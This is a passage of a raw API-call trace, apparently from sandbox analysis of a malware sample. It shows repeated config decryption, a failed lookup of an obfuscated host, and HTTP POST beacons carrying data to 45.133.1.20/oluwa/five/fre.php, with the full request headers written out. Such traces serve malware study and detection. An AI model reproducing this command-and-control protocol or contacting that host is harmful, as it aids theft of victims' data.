[0165.540] FreeAddrInfoW (pAddrInfo=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be940*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0165.540] GetProcessHeap () returned 0x6a0000 [0165.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0165.540] GetProcessHeap () returned 0x6a0000 [0165.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0165.541] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.542] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0165.542] GetProcessHeap () returned 0x6a0000 [0165.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0165.542] GetProcessHeap () returned 0x6a0000 [0165.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.543] GetProcessHeap () returned 0x6a0000 [0165.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0165.543] GetProcessHeap () returned 0x6a0000 [0165.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0165.544] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.545] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0165.545] GetProcessHeap () returned 0x6a0000 [0165.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0165.545] GetProcessHeap () returned 0x6a0000 [0165.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.545] send (s=0x2f4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0165.546] send (s=0x2f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0165.546] GetProcessHeap () returned 0x6a0000 [0165.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0165.546] recv (in: s=0x2f4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0165.648] GetProcessHeap () returned 0x6a0000 [0165.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0165.649] GetProcessHeap () returned 0x6a0000 [0165.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0165.649] GetProcessHeap () returned 0x6a0000 [0165.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0165.650] GetProcessHeap () returned 0x6a0000 [0165.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0165.650] closesocket (s=0x2f4) returned 0 [0165.651] GetProcessHeap () returned 0x6a0000 [0165.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0165.652] GetProcessHeap () returned 0x6a0000 [0165.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.652] GetProcessHeap () returned 0x6a0000 [0165.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.653] GetProcessHeap () returned 0x6a0000 [0165.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf88) returned 0x2f4 [0165.678] Sleep (dwMilliseconds=0xea60) [0165.679] GetProcessHeap () returned 0x6a0000 [0165.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0165.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0165.707] GetProcessHeap () returned 0x6a0000 [0165.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0165.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.708] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0165.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.709] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.711] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.711] GetProcessHeap () returned 0x6a0000 [0165.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0165.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.715] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0165.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.716] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0165.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.717] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0165.717] GetProcessHeap () returned 0x6a0000 [0165.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.719] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.720] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.721] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.721] GetProcessHeap () returned 0x6a0000 [0165.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.721] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0165.721] GetProcessHeap () returned 0x6a0000 [0165.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.722] GetProcessHeap () returned 0x6a0000 [0165.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.722] GetProcessHeap () returned 0x6a0000 [0165.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.722] GetProcessHeap () returned 0x6a0000 [0165.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0165.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.724] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0165.741] GetProcessHeap () returned 0x6a0000 [0165.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0165.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.742] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0165.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.743] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.744] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.744] GetProcessHeap () returned 0x6a0000 [0165.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0165.745] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.746] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0165.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.747] CryptDestroyKey (hKey=0x6ad020) returned 1 [0165.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.748] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0165.748] GetProcessHeap () returned 0x6a0000 [0165.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.749] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0165.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.750] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0165.751] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.751] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0165.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.753] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0165.753] GetProcessHeap () returned 0x6a0000 [0165.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.753] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9f78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0165.753] GetProcessHeap () returned 0x6a0000 [0165.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0165.753] socket (af=2, type=1, protocol=6) returned 0x2f8 [0165.753] connect (s=0x2f8, name=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0165.779] FreeAddrInfoW (pAddrInfo=0x6b9f78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9e8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0165.779] GetProcessHeap () returned 0x6a0000 [0165.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0165.779] GetProcessHeap () returned 0x6a0000 [0165.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0165.779] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.780] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0165.780] GetProcessHeap () returned 0x6a0000 [0165.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0165.780] GetProcessHeap () returned 0x6a0000 [0165.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.781] GetProcessHeap () returned 0x6a0000 [0165.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0165.781] GetProcessHeap () returned 0x6a0000 [0165.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0165.782] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0165.782] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0165.782] GetProcessHeap () returned 0x6a0000 [0165.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0165.782] GetProcessHeap () returned 0x6a0000 [0165.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0165.783] send (s=0x2f8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0165.784] send (s=0x2f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0165.784] GetProcessHeap () returned 0x6a0000 [0165.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0165.784] recv (in: s=0x2f8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0165.870] GetProcessHeap () returned 0x6a0000 [0165.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0165.870] GetProcessHeap () returned 0x6a0000 [0165.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0165.871] GetProcessHeap () returned 0x6a0000 [0165.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0165.872] GetProcessHeap () returned 0x6a0000 [0165.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0165.873] closesocket (s=0x2f8) returned 0 [0165.873] GetProcessHeap () returned 0x6a0000 [0165.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0165.873] GetProcessHeap () returned 0x6a0000 [0165.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.874] GetProcessHeap () returned 0x6a0000 [0165.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.874] GetProcessHeap () returned 0x6a0000 [0165.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.875] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5c0) returned 0x2f8 [0165.878] Sleep (dwMilliseconds=0xea60) [0165.881] GetProcessHeap () returned 0x6a0000 [0165.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0165.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.888] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0165.925] GetProcessHeap () returned 0x6a0000 [0165.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0165.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.926] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0165.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.927] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.928] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.928] GetProcessHeap () returned 0x6a0000 [0165.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0165.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.930] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0165.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.931] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0165.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.932] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0165.932] GetProcessHeap () returned 0x6a0000 [0165.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.933] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0165.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.935] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0165.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.941] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0165.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.943] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0165.943] GetProcessHeap () returned 0x6a0000 [0165.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.943] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0165.943] GetProcessHeap () returned 0x6a0000 [0165.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0165.944] GetProcessHeap () returned 0x6a0000 [0165.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0165.944] GetProcessHeap () returned 0x6a0000 [0165.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0165.944] GetProcessHeap () returned 0x6a0000 [0165.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0165.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0165.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0165.962] GetProcessHeap () returned 0x6a0000 [0165.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0165.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.964] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0165.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.965] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0165.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0165.966] GetProcessHeap () returned 0x6a0000 [0165.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0165.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.968] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0165.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.970] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0165.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0165.971] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0165.971] GetProcessHeap () returned 0x6a0000 [0165.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0165.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.973] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0165.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.974] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0165.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.975] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0165.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.977] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0165.977] GetProcessHeap () returned 0x6a0000 [0165.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0165.977] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0165.977] GetProcessHeap () returned 0x6a0000 [0165.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0165.977] socket (af=2, type=1, protocol=6) returned 0x2fc [0165.977] connect (s=0x2fc, name=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0166.004] FreeAddrInfoW (pAddrInfo=0x6b9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be958*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0166.004] GetProcessHeap () returned 0x6a0000 [0166.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0166.004] GetProcessHeap () returned 0x6a0000 [0166.004] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0166.005] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0166.006] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST 